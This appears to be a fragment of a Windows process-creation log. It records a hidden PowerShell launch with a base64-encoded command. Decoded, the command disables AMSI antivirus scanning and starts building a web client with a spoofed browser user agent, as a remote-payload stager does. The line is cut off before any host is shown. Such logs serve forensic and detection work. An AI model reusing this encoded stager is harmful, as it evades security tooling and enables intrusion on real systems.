│   │   └── 2017-08-24T03:55:14.000+00:00 Create Process C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc  WwBSAGUARgBdAC4AQQBTAHMARQBNAGIATABZAC4ARwBlAFQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAEkARQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAHUARQAoACQATgBVAEwAbAAsACQAdAByAFUARQApAH0AOwBbAFMAWQBzAHQARQBNAC4ATgBlAHQALgBTAEUAUgB2AGkAQwBlAFAAbwBJAE4AdABNAEEAbgBBAEcAZQByAF0AOgA6AEUAWABwAEUAYwB0ADEAMAAwAEMAbwBuAHQASQBuAHUARQA9ADAAOwAkAFcAYwA9AE4AZQBXAC0ATwBiAGoAZQBjAHQAIABTAHkAUwB0AEUATQAuAE4AZQBUAC4AVwBlAEIAQwBMAEkAZQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4A